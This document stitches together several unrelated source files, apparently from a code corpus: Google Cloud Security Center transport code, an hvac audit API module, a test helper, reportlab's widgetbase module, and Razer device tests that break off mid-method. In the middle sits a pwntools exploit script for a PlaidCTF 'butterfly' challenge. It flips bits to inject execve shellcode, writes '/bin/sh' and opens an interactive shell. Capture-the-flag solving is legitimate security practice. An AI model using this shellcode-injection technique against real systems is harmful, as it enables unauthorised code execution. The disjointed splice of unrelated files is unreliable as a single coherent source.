self.delete_notification_config: gapic_v1.method.wrap_method(
self.delete_notification_config,
default_timeout=60.0,
client_info=client_info,
),
self.get_iam_policy: gapic_v1.method.wrap_method(
self.get_iam_policy,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.get_notification_config: gapic_v1.method.wrap_method(
self.get_notification_config,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.get_organization_settings: gapic_v1.method.wrap_method(
self.get_organization_settings,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.get_source: gapic_v1.method.wrap_method(
self.get_source,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.group_assets: gapic_v1.method.wrap_method(
self.group_assets,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.group_findings: gapic_v1.method.wrap_method(
self.group_findings,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.list_assets: gapic_v1.method.wrap_method(
self.list_assets,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.list_findings: gapic_v1.method.wrap_method(
self.list_findings,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=480.0,
),
default_timeout=480.0,
client_info=client_info,
),
self.list_notification_configs: gapic_v1.method.wrap_method(
self.list_notification_configs,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.list_sources: gapic_v1.method.wrap_method(
self.list_sources,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.run_asset_discovery: gapic_v1.method.wrap_method(
self.run_asset_discovery,
default_timeout=60.0,
client_info=client_info,
),
self.set_finding_state: gapic_v1.method.wrap_method(
self.set_finding_state,
default_timeout=60.0,
client_info=client_info,
),
self.set_iam_policy: gapic_v1.method.wrap_method(
self.set_iam_policy,
default_timeout=60.0,
client_info=client_info,
),
self.test_iam_permissions: gapic_v1.method.wrap_method(
self.test_iam_permissions,
default_retry=retries.Retry(
initial=0.1,maximum=60.0,multiplier=1.3, predicate=retries.if_exception_type(
core_exceptions.DeadlineExceeded,
core_exceptions.ServiceUnavailable,
),
deadline=60.0,
),
default_timeout=60.0,
client_info=client_info,
),
self.update_finding: gapic_v1.method.wrap_method(
self.update_finding,
default_timeout=60.0,
client_info=client_info,
),
self.update_notification_config: gapic_v1.method.wrap_method(
self.update_notification_config,
default_timeout=60.0,
client_info=client_info,
),
self.update_organization_settings: gapic_v1.method.wrap_method(
self.update_organization_settings,
default_timeout=60.0,
client_info=client_info,
),
self.update_source: gapic_v1.method.wrap_method(
self.update_source,
default_timeout=60.0,
client_info=client_info,
),
self.update_security_marks: gapic_v1.method.wrap_method(
self.update_security_marks,
default_timeout=480.0,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def create_source(self) -> Callable[
[securitycenter_service.CreateSourceRequest],
Union[
gcs_source.Source,
Awaitable[gcs_source.Source]
]]:
raise NotImplementedError()
@property
def create_finding(self) -> Callable[
[securitycenter_service.CreateFindingRequest],
Union[
gcs_finding.Finding,
Awaitable[gcs_finding.Finding]
]]:
raise NotImplementedError()
@property
def create_notification_config(self) -> Callable[
[securitycenter_service.CreateNotificationConfigRequest],
Union[
gcs_notification_config.NotificationConfig,
Awaitable[gcs_notification_config.NotificationConfig]
]]:
raise NotImplementedError()
@property
def delete_notification_config(self) -> Callable[
[securitycenter_service.DeleteNotificationConfigRequest],
Union[
empty_pb2.Empty,
Awaitable[empty_pb2.Empty]
]]:
raise NotImplementedError()
@property
def get_iam_policy(self) -> Callable[
[iam_policy_pb2.GetIamPolicyRequest],
Union[
policy_pb2.Policy,
Awaitable[policy_pb2.Policy]
]]:
raise NotImplementedError()
@property
def get_notification_config(self) -> Callable[
[securitycenter_service.GetNotificationConfigRequest],
Union[
notification_config.NotificationConfig,
Awaitable[notification_config.NotificationConfig]
]]:
raise NotImplementedError()
@property
def get_organization_settings(self) -> Callable[
[securitycenter_service.GetOrganizationSettingsRequest],
Union[
organization_settings.OrganizationSettings,
Awaitable[organization_settings.OrganizationSettings]
]]:
raise NotImplementedError()
@property
def get_source(self) -> Callable[
[securitycenter_service.GetSourceRequest],
Union[
source.Source,
Awaitable[source.Source]
]]:
raise NotImplementedError()
@property
def group_assets(self) -> Callable[
[securitycenter_service.GroupAssetsRequest],
Union[
securitycenter_service.GroupAssetsResponse,
Awaitable[securitycenter_service.GroupAssetsResponse]
]]:
raise NotImplementedError()
@property
def group_findings(self) -> Callable[
[securitycenter_service.GroupFindingsRequest],
Union[
securitycenter_service.GroupFindingsResponse,
Awaitable[securitycenter_service.GroupFindingsResponse]
]]:
raise NotImplementedError()
@property
def list_assets(self) -> Callable[
[securitycenter_service.ListAssetsRequest],
Union[
securitycenter_service.ListAssetsResponse,
Awaitable[securitycenter_service.ListAssetsResponse]
]]:
raise NotImplementedError()
@property
def list_findings(self) -> Callable[
[securitycenter_service.ListFindingsRequest],
Union[
securitycenter_service.ListFindingsResponse,
Awaitable[securitycenter_service.ListFindingsResponse]
]]:
raise NotImplementedError()
@property
def list_notification_configs(self) -> Callable[
[securitycenter_service.ListNotificationConfigsRequest],
Union[
securitycenter_service.ListNotificationConfigsResponse,
Awaitable[securitycenter_service.ListNotificationConfigsResponse]
]]:
raise NotImplementedError()
@property
def list_sources(self) -> Callable[
[securitycenter_service.ListSourcesRequest],
Union[
securitycenter_service.ListSourcesResponse,
Awaitable[securitycenter_service.ListSourcesResponse]
]]:
raise NotImplementedError()
@property
def run_asset_discovery(self) -> Callable[
[securitycenter_service.RunAssetDiscoveryRequest],
Union[
operations_pb2.Operation,
Awaitable[operations_pb2.Operation]
]]:
raise NotImplementedError()
@property
def set_finding_state(self) -> Callable[
[securitycenter_service.SetFindingStateRequest],
Union[
finding.Finding,
Awaitable[finding.Finding]
]]:
raise NotImplementedError()
@property
def set_iam_policy(self) -> Callable[
[iam_policy_pb2.SetIamPolicyRequest],
Union[
policy_pb2.Policy,
Awaitable[policy_pb2.Policy]
]]:
raise NotImplementedError()
@property
def test_iam_permissions(self) -> Callable[
[iam_policy_pb2.TestIamPermissionsRequest],
Union[
iam_policy_pb2.TestIamPermissionsResponse,
Awaitable[iam_policy_pb2.TestIamPermissionsResponse]
]]:
raise NotImplementedError()
@property
def update_finding(self) -> Callable[
[securitycenter_service.UpdateFindingRequest],
Union[
gcs_finding.Finding,
Awaitable[gcs_finding.Finding]
]]:
raise NotImplementedError()
@property
def update_notification_config(self) -> Callable[
[securitycenter_service.UpdateNotificationConfigRequest],
Union[
gcs_notification_config.NotificationConfig,
Awaitable[gcs_notification_config.NotificationConfig]
]]:
raise NotImplementedError()
@property
def update_organization_settings(self) -> Callable[
[securitycenter_service.UpdateOrganizationSettingsRequest],
Union[
gcs_organization_settings.OrganizationSettings,
Awaitable[gcs_organization_settings.OrganizationSettings]
]]:
raise NotImplementedError()
@property
def update_source(self) -> Callable[
[securitycenter_service.UpdateSourceRequest],
Union[
gcs_source.Source,
Awaitable[gcs_source.Source]
]]:
raise NotImplementedError()
@property
def update_security_marks(self) -> Callable[
[securitycenter_service.UpdateSecurityMarksRequest],
Union[
gcs_security_marks.SecurityMarks,
Awaitable[gcs_security_marks.SecurityMarks]
]]:
raise NotImplementedError()
__all__ = (
'SecurityCenterTransport',
)
| apache-2.0 | 3,579,657,692,665,785,300 | 39.09965 | 161 | 0.582857 | false |
ianunruh/hvac | hvac/api/system_backend/audit.py | 1 | 3598 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Support for "Audit"-related System Backend Methods."""
from hvac.api.system_backend.system_backend_mixin import SystemBackendMixin
class Audit(SystemBackendMixin):
def list_enabled_audit_devices(self):
"""List enabled audit devices.
It does not list all available audit devices.
This endpoint requires sudo capability in addition to any path-specific capabilities.
Supported methods:
GET: /sys/audit. Produces: 200 application/json
:return: JSON response of the request.
:rtype: dict
"""
list_audit_devices_response = self._adapter.get('/v1/sys/audit').json()
return list_audit_devices_response
def enable_audit_device(self, device_type, description=None, options=None, path=None):
"""Enable a new audit device at the supplied path.
The path can be a single word name or a more complex, nested path.
Supported methods:
PUT: /sys/audit/{path}. Produces: 204 (empty body)
:param device_type: Specifies the type of the audit device.
:type device_type: str | unicode
:param description: Human-friendly description of the audit device.
:type description: str | unicode
:param options: Configuration options to pass to the audit device itself. This is
dependent on the audit device type.
:type options: str | unicode
:param path: Specifies the path in which to enable the audit device. This is part of
the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
if path is None:
path = device_type
params = {
'type': device_type,
'description': description,
'options': options,
}
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.post(
url=api_path,
json=params
)
def disable_audit_device(self, path):
"""Disable the audit device at the given path.
Supported methods:
DELETE: /sys/audit/{path}. Produces: 204 (empty body)
:param path: The path of the audit device to delete. This is part of the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.delete(
url=api_path,
)
def calculate_hash(self, path, input_to_hash):
"""Hash the given input data with the specified audit device's hash function and salt.
This endpoint can be used to discover whether a given plaintext string (the input parameter) appears in the
audit log in obfuscated form.
Supported methods:
POST: /sys/audit-hash/{path}. Produces: 204 (empty body)
:param path: The path of the audit device to generate hashes for. This is part of the request URL.
:type path: str | unicode
:param input_to_hash: The input string to hash.
:type input_to_hash: str | unicode
:return: The JSON response of the request.
:rtype: requests.Response
"""
params = {
'input': input_to_hash,
}
api_path = '/v1/sys/audit-hash/{path}'.format(path=path)
response = self._adapter.post(
url=api_path,
json=params
)
return response.json()
| apache-2.0 | 181,234,886,285,527,170 | 34.27451 | 115 | 0.611451 | false |
Melrok/energistream-py | tests/verify.py | 1 | 1840 | #would like to use difflib here eventually
hashLine = ('#' * 80) + '\n'
class Verify(object):
def str_equal(self, expected, actual, errMessage=None):
if self == expected:
return
if expected is None:
raise AssertionError("{0} expected is None".format(errMessage))
if actual is None:
raise AssertionError("{0} actual is None".format(errMessage))
return self.equal(str(expected), str(actual), errMessage)
def equal(self, expected, actual, err_message=None):
if expected == actual:
return
if type(expected) != type(actual):
message = '\n' + hashLine
message += '\tType mismatch, expected type "{0}"\n\tactually "{1}"'.format(str(type(expected)), str(type(actual)))
message += '\n' + hashLine
raise AssertionError(message)
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
message += hashLine
message += '\texpected "{0}"\n\tactually "{1}"'.format(str(expected), str(actual))
message += '\n' + hashLine
raise AssertionError(message)
def str_in(self, container, contained, err_message=None):
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
if container is None:
raise AssertionError("{0} container is None".format(message))
if contained is None:
raise AssertionError("{0} contained is None".format(message))
if contained in container:
return
message += hashLine
message += '\texpected:\t"{0}" \n\tin:\t\t"{1}"'.format(contained, container)
message += '\n' + hashLine
raise AssertionError(message)
| mit | 895,279,386,831,197,200 | 33.716981 | 126 | 0.573913 | false |
tschalch/pyTray | src/lib/reportlab/graphics/widgetbase.py | 1 | 17565 | #Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/widgetbase.py
__version__=''' $Id: widgetbase.py,v 1.1 2006/05/26 19:19:38 thomas Exp $ '''
import string
from reportlab.graphics import shapes
from reportlab import rl_config
from reportlab.lib import colors
from reportlab.lib.validators import *
from reportlab.lib.attrmap import *
class PropHolder:
'''Base for property holders'''
_attrMap = None
def verify(self):
"""If the _attrMap attribute is not None, this
checks all expected attributes are present; no
unwanted attributes are present; and (if a
checking function is found) checks each
attribute has a valid value. Either succeeds
or raises an informative exception.
"""
if self._attrMap is not None:
for key in self.__dict__.keys():
if key[0] <> '_':
msg = "Unexpected attribute %s found in %s" % (key, self)
assert self._attrMap.has_key(key), msg
for (attr, metavalue) in self._attrMap.items():
msg = "Missing attribute %s from %s" % (attr, self)
assert hasattr(self, attr), msg
value = getattr(self, attr)
args = (value, attr, self.__class__.__name__)
assert metavalue.validate(value), "Invalid value %s for attribute %s in class %s" % args
if rl_config.shapeChecking:
"""This adds the ability to check every attribute assignment
as it is made. It slows down shapes but is a big help when
developing. It does not get defined if rl_config.shapeChecking = 0.
"""
def __setattr__(self, name, value):
"""By default we verify. This could be off
in some parallel base classes."""
validateSetattr(self,name,value)
def getProperties(self,recur=1):
"""Returns a list of all properties which can be edited and
which are not marked as private. This may include 'child
widgets' or 'primitive shapes'. You are free to override
this and provide alternative implementations; the default
one simply returns everything without a leading underscore.
"""
from reportlab.lib.validators import isValidChild
# TODO when we need it, but not before -
# expose sequence contents?
props = {}
for name in self.__dict__.keys():
if name[0:1] <> '_':
component = getattr(self, name)
if recur and isValidChild(component):
# child object, get its properties too
childProps = component.getProperties(recur=recur)
for (childKey, childValue) in childProps.items():
#key might be something indexed like '[2].fillColor'
#or simple like 'fillColor'; in the former case we
#don't need a '.' between me and my child.
if childKey[0] == '[':
props['%s%s' % (name, childKey)] = childValue
else:
props['%s.%s' % (name, childKey)] = childValue
else:
props[name] = component
return props
def setProperties(self, propDict):
"""Permits bulk setting of properties. These may include
child objects e.g. "chart.legend.width = 200".
All assignments will be validated by the object as if they
were set individually in python code.
All properties of a top-level object are guaranteed to be
set before any of the children, which may be helpful to
widget designers.
"""
childPropDicts = {}
for (name, value) in propDict.items():
parts = string.split(name, '.', 1)
if len(parts) == 1:
#simple attribute, set it now
setattr(self, name, value)
else:
(childName, remains) = parts
try:
childPropDicts[childName][remains] = value
except KeyError:
childPropDicts[childName] = {remains: value}
# now assign to children
for (childName, childPropDict) in childPropDicts.items():
child = getattr(self, childName)
child.setProperties(childPropDict)
def dumpProperties(self, prefix=""):
"""Convenience. Lists them on standard output. You
may provide a prefix - mostly helps to generate code
samples for documentation.
"""
propList = self.getProperties().items()
propList.sort()
if prefix:
prefix = prefix + '.'
for (name, value) in propList:
print '%s%s = %s' % (prefix, name, value)
class Widget(PropHolder, shapes.UserNode):
"""Base for all user-defined widgets. Keep as simple as possible. Does
not inherit from Shape so that we can rewrite shapes without breaking
widgets and vice versa."""
def _setKeywords(self,**kw):
for k,v in kw.items():
if not self.__dict__.has_key(k):
setattr(self,k,v)
def draw(self):
msg = "draw() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def demo(self):
msg = "demo() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def provideNode(self):
return self.draw()
def getBounds(self):
"Return outer boundary as x1,y1,x2,y2. Can be overridden for efficiency"
return self.draw().getBounds()
_ItemWrapper={}
class TypedPropertyCollection(PropHolder):
"""A container with properties for objects of the same kind.
This makes it easy to create lists of objects. You initialize
it with a class of what it is to contain, and that is all you
can add to it. You can assign properties to the collection
as a whole, or to a numeric index within it; if so it creates
a new child object to hold that data.
So:
wedges = TypedPropertyCollection(WedgeProperties)
wedges.strokeWidth = 2 # applies to all
wedges.strokeColor = colors.red # applies to all
wedges[3].strokeColor = colors.blue # only to one
The last line should be taken as a prescription of how to
create wedge no. 3 if one is needed; no error is raised if
there are only two data points.
"""
def __init__(self, exampleClass):
#give it same validation rules as what it holds
self.__dict__['_value'] = exampleClass()
self.__dict__['_children'] = {}
def __getitem__(self, index):
try:
return self._children[index]
except KeyError:
Klass = self._value.__class__
if _ItemWrapper.has_key(Klass):
WKlass = _ItemWrapper[Klass]
else:
class WKlass(Klass):
def __getattr__(self,name):
try:
return self.__class__.__bases__[0].__getattr__(self,name)
except:
if self._index and self._parent._children.has_key(self._index):
if self._parent._children[self._index].__dict__.has_key(name):
return getattr(self._parent._children[self._index],name)
return getattr(self._parent,name)
_ItemWrapper[Klass] = WKlass
child = WKlass()
child._parent = self
if type(index) in (type(()),type([])):
index = tuple(index)
if len(index)>1:
child._index = tuple(index[:-1])
else:
child._index = None
else:
child._index = None
for i in filter(lambda x,K=child.__dict__.keys(): x in K,child._attrMap.keys()):
del child.__dict__[i]
self._children[index] = child
return child
def has_key(self,key):
if type(key) in (type(()),type([])): key = tuple(key)
return self._children.has_key(key)
def __setitem__(self, key, value):
msg = "This collection can only hold objects of type %s" % self._value.__class__.__name__
assert isinstance(value, self._value.__class__), msg
def __len__(self):
return len(self._children.keys())
def getProperties(self,recur=1):
# return any children which are defined and whatever
# differs from the parent
props = {}
for (key, value) in self._value.getProperties(recur=recur).items():
props['%s' % key] = value
for idx in self._children.keys():
childProps = self._children[idx].getProperties(recur=recur)
for (key, value) in childProps.items():
if not hasattr(self,key) or getattr(self, key)<>value:
newKey = '[%s].%s' % (idx, key)
props[newKey] = value
return props
def setVector(self,**kw):
for name, value in kw.items():
for i in xrange(len(value)):
setattr(self[i],name,value[i])
def __getattr__(self,name):
return getattr(self._value,name)
def __setattr__(self,name,value):
return setattr(self._value,name,value)
## No longer needed!
class StyleProperties(PropHolder):
"""A container class for attributes used in charts and legends.
Attributes contained can be those for any graphical element
(shape?) in the ReportLab graphics package. The idea for this
container class is to be useful in combination with legends
and/or the individual appearance of data series in charts.
A legend could be as simple as a wrapper around a list of style
properties, where the 'desc' attribute contains a descriptive
string and the rest could be used by the legend e.g. to draw
something like a color swatch. The graphical presentation of
the legend would be its own business, though.
A chart could be inspecting a legend or, more directly, a list
of style properties to pick individual attributes that it knows
about in order to render a particular row of the data. A bar
chart e.g. could simply use 'strokeColor' and 'fillColor' for
drawing the bars while a line chart could also use additional
ones like strokeWidth.
"""
_attrMap = AttrMap(
strokeWidth = AttrMapValue(isNumber),
strokeLineCap = AttrMapValue(isNumber),
strokeLineJoin = AttrMapValue(isNumber),
strokeMiterLimit = AttrMapValue(None),
strokeDashArray = AttrMapValue(isListOfNumbersOrNone),
strokeOpacity = AttrMapValue(isNumber),
strokeColor = AttrMapValue(isColorOrNone),
fillColor = AttrMapValue(isColorOrNone),
desc = AttrMapValue(isString),
)
def __init__(self, **kwargs):
"Initialize with attributes if any."
for k, v in kwargs.items():
setattr(self, k, v)
def __setattr__(self, name, value):
"Verify attribute name and value, before setting it."
validateSetattr(self,name,value)
class TwoCircles(Widget):
def __init__(self):
self.leftCircle = shapes.Circle(100,100,20, fillColor=colors.red)
self.rightCircle = shapes.Circle(300,100,20, fillColor=colors.red)
def draw(self):
return shapes.Group(self.leftCircle, self.rightCircle)
class Face(Widget):
"""This draws a face with two eyes.
It exposes a couple of properties
to configure itself and hides all other details.
"""
_attrMap = AttrMap(
x = AttrMapValue(isNumber),
y = AttrMapValue(isNumber),
size = AttrMapValue(isNumber),
skinColor = AttrMapValue(isColorOrNone),
eyeColor = AttrMapValue(isColorOrNone),
mood = AttrMapValue(OneOf('happy','sad','ok')),
)
def __init__(self):
self.x = 10
self.y = 10
self.size = 80
self.skinColor = None
self.eyeColor = colors.blue
self.mood = 'happy'
def demo(self):
pass
def draw(self):
s = self.size # abbreviate as we will use this a lot
g = shapes.Group()
g.transform = [1,0,0,1,self.x, self.y]
# background
g.add(shapes.Circle(s * 0.5, s * 0.5, s * 0.5, fillColor=self.skinColor))
# left eye
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.35, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# right eye
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.1, fillColor=colors.white))
g.add(shapes.Circle(s * 0.65, s * 0.65, s * 0.05, fillColor=self.eyeColor))
# nose
g.add(shapes.Polygon(
points=[s * 0.5, s * 0.6, s * 0.4, s * 0.3, s * 0.6, s * 0.3],
fillColor=None))
# mouth
if self.mood == 'happy':
offset = -0.05
elif self.mood == 'sad':
offset = +0.05
else:
offset = 0
g.add(shapes.Polygon(
points = [
s * 0.3, s * 0.2, #left of mouth
s * 0.7, s * 0.2, #right of mouth
s * 0.6, s * (0.2 + offset), # the bit going up or down
s * 0.4, s * (0.2 + offset) # the bit going up or down
],
fillColor = colors.pink,
strokeColor = colors.red,
strokeWidth = s * 0.03
))
return g
class TwoFaces(Widget):
def __init__(self):
self.faceOne = Face()
self.faceOne.mood = "happy"
self.faceTwo = Face()
self.faceTwo.x = 100
self.faceTwo.mood = "sad"
def draw(self):
"""Just return a group"""
return shapes.Group(self.faceOne, self.faceTwo)
def demo(self):
"""The default case already looks good enough,
no implementation needed here"""
pass
class Sizer(Widget):
"Container to show size of all enclosed objects"
_attrMap = AttrMap(BASE=shapes.SolidShape,
contents = AttrMapValue(isListOfShapes,desc="Contained drawable elements"),
)
def __init__(self, *elements):
self.contents = []
self.fillColor = colors.cyan
self.strokeColor = colors.magenta
for elem in elements:
self.add(elem)
def _addNamedNode(self,name,node):
'if name is not None add an attribute pointing to node and add to the attrMap'
if name:
if name not in self._attrMap.keys():
self._attrMap[name] = AttrMapValue(isValidChild)
setattr(self, name, node)
def add(self, node, name=None):
"""Appends non-None child node to the 'contents' attribute. In addition,
if a name is provided, it is subsequently accessible by name
"""
# propagates properties down
if node is not None:
assert isValidChild(node), "Can only add Shape or UserNode objects to a Group"
self.contents.append(node)
self._addNamedNode(name,node)
def getBounds(self):
# get bounds of each object
if self.contents:
b = []
for elem in self.contents:
b.append(elem.getBounds())
return shapes.getRectsBounds(b)
else:
return (0,0,0,0)
def draw(self):
g = shapes.Group()
(x1, y1, x2, y2) = self.getBounds()
r = shapes.Rect(
x = x1,
y = y1,
width = x2-x1,
height = y2-y1,
fillColor = self.fillColor,
strokeColor = self.strokeColor
)
g.add(r)
for elem in self.contents:
g.add(elem)
return g
def test():
from reportlab.graphics.charts.piecharts import WedgeProperties
wedges = TypedPropertyCollection(WedgeProperties)
wedges.fillColor = colors.red
wedges.setVector(fillColor=(colors.blue,colors.green,colors.white))
print len(_ItemWrapper)
d = shapes.Drawing(400, 200)
tc = TwoCircles()
d.add(tc)
import renderPDF
renderPDF.drawToFile(d, 'sample_widget.pdf', 'A Sample Widget')
print 'saved sample_widget.pdf'
d = shapes.Drawing(400, 200)
f = Face()
f.skinColor = colors.yellow
f.mood = "sad"
d.add(f, name='theFace')
print 'drawing 1 properties:'
d.dumpProperties()
renderPDF.drawToFile(d, 'face.pdf', 'A Sample Widget')
print 'saved face.pdf'
d2 = d.expandUserNodes()
renderPDF.drawToFile(d2, 'face_copy.pdf', 'An expanded drawing')
print 'saved face_copy.pdf'
print 'drawing 2 properties:'
d2.dumpProperties()
if __name__=='__main__':
test()
| bsd-3-clause | -6,657,977,910,297,390,000 | 33.846939 | 111 | 0.561856 | false |
parksjin01/ctf | 2016/Plaid/butterfly.py | 1 | 1767 | #!/usr/bin/env python2
from pwn import *
#r = remote('butterfly.pwning.xxx', 9999)
r = process('./butterfly')
loop_val = '0x20041c6'
# Start the loop
r.sendline(loop_val)
# Generate the payload
start_addr = 0x40084a
shell_addr = 0x400914
shellcode = '4831f648c7c03b0000004831d248c7c7140940000f05'
text = '4531f664488b042528000000483b44244075264489f0'
shell = ''.join('{:02x}'.format(ord(c)) for c in list('/bin/sh\0'))
greeting = 'THOU ART GOD, WHITHER CASTEST THY COSMIC RAY?'[0:8]
greeting = ''.join('{:02x}'.format(ord(c)) for c in greeting)
# We need to parse it bytes after bytes
chunks_sc = [shellcode[i:i+2] for i in range(0, len(shellcode), 2)]
chunks_tx = [text[i:i+2] for i in range(0, len(text), 2)]
# loop over each byte
for i in range(0,len(chunks_tx)):
# compute the flips needed
flips = list('{:08b}'.format(int(chunks_tx[i],16) ^ int(chunks_sc[i], 16)))
flips.reverse()
indices = []
# store the offsets of the flips in a table
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
# for each flip send a corresponding number
for n in indices:
r.sendline('0x{:x}'.format((start_addr + i) * 8 + n))
#Same for the greeting and shell
chunks_sh = [shell[i:i+2] for i in range(0, len(shell), 2)]
chunks_gr = [greeting[i:i+2] for i in range(0, len(greeting), 2)]
for i in range(0,len(chunks_gr)):
flips = list('{:08b}'.format(int(chunks_gr[i],16) ^ int(chunks_sh[i], 16)))
flips.reverse()
indices = []
for j in range(0,len(flips)):
if (flips[j] == '1'):
indices.append(j)
for n in indices:
r.sendline('0x{:x}'.format((shell_addr + i) * 8 + n))
# Reset the call to mprotect
r.sendline(loop_val)
r.clean()
r.interactive()
| mit | -8,768,587,543,166,460,000 | 30.553571 | 79 | 0.633843 | false |
z3ntu/razer-drivers | pylib/tests/integration_tests/test_device_manager.py | 1 | 11809 | import multiprocessing
import os
import signal
import tempfile
import time
import unittest
import shutil
import razer.client
import razer_daemon.daemon
import razer._fake_driver as fake_driver
import coverage
def run_daemon(daemon_dir, driver_dir):
# TODO console_log false
razer_daemon.daemon.daemonize(foreground=True, verbose=True, console_log=False, run_dir=daemon_dir, pid_file=os.path.join(daemon_dir, 'razer-daemon.pid'), test_dir=driver_dir)
class DeviceManagerTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._daemon_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemondata')
cls._tmp_dir = tempfile.mkdtemp(prefix='tmp_', suffix='_daemontest')
cls._bw_serial = 'IO0000000000001'
cls._bw_chroma = fake_driver.FakeDevice('razerblackwidowchroma', serial=cls._bw_serial, tmp_dir=cls._tmp_dir)
print("Created BlackWidow Chroma endpoints")
cls._daemon_proc = multiprocessing.Process(target=run_daemon, args=(cls._daemon_dir, cls._tmp_dir))
cls._daemon_proc.start()
print("Started daemon")
time.sleep(5)
@classmethod
def tearDownClass(cls):
print("Stopping daemon")
os.kill(cls._daemon_proc.pid, signal.SIGINT)
time.sleep(3)
if cls._daemon_proc.is_alive():
print("Daemon still alive...")
time.sleep(8)
if cls._daemon_proc.is_alive():
cls._daemon_proc.terminate()
if cls._daemon_proc.is_alive():
print("Failed to kill daemon")
cls._bw_chroma.close()
shutil.rmtree(cls._tmp_dir)
shutil.rmtree(cls._daemon_dir)
time.sleep(5)
def setUp(self):
self._bw_chroma.create_endpoints()
self.device_manager = razer.client.DeviceManager()
def test_device_list(self):
self.assertEqual(len(self.device_manager.devices), 1)
def test_serial(self):
device = self.device_manager.devices[0]
self.assertEqual(device.serial, self._bw_chroma.get('get_serial'))
def test_name(self):
device = self.device_manager.devices[0]
self.assertEqual(device.name, self._bw_chroma.get('device_type'))
def test_type(self):
device = self.device_manager.devices[0]
self.assertEqual(device.type, 'keyboard')
def test_fw_version(self):
device = self.device_manager.devices[0]
self.assertEqual(device.firmware_version, self._bw_chroma.get('get_firmware_version'))
def test_brightness(self):
device = self.device_manager.devices[0]
# Test 100%
device.brightness = 100.0
self.assertEqual('255', self._bw_chroma.get('set_brightness'))
self.assertEqual(100.0, device.brightness)
device.brightness = 50.0
self.assertEqual('127', self._bw_chroma.get('set_brightness'))
self.assertAlmostEqual(50.0, device.brightness, delta=0.4)
device.brightness = 0.0
self.assertEqual('0', self._bw_chroma.get('set_brightness'))
self.assertEqual(0, device.brightness)
def test_capabilities(self):
device = self.device_manager.devices[0]
self.assertEqual(device.capabilities, device._capabilities)
def test_device_keyboard_game_mode(self):
device = self.device_manager.devices[0]
self._bw_chroma.set('mode_game', '1')
self.assertTrue(device.game_mode_led)
device.game_mode_led = False
self.assertEqual(self._bw_chroma.get('mode_game'), '0')
device.game_mode_led = True
self.assertEqual(self._bw_chroma.get('mode_game'), '1')
def test_device_keyboard_macro_mode(self):
device = self.device_manager.devices[0]
self._bw_chroma.set('mode_macro', '1')
self.assertTrue(device.macro_mode_led)
device.macro_mode_led = False
self.assertEqual(self._bw_chroma.get('mode_macro'), '0')
device.macro_mode_led = True
self.assertEqual(self._bw_chroma.get('mode_macro'), '1')
self._bw_chroma.set('mode_macro_effect', '0')
self.assertEqual(device.macro_mode_led_effect, razer.client.constants.MACRO_LED_STATIC)
device.macro_mode_led_effect = razer.client.constants.MACRO_LED_BLINK
self.assertEqual(self._bw_chroma.get('mode_macro'), str(razer.client.constants.MACRO_LED_BLINK))
def test_device_keyboard_effect_none(self):
device = self.device_manager.devices[0]
device.fx.none()
self.assertEqual(self._bw_chroma.get('mode_none'), '1')
def test_device_keyboard_effect_spectrum(self):
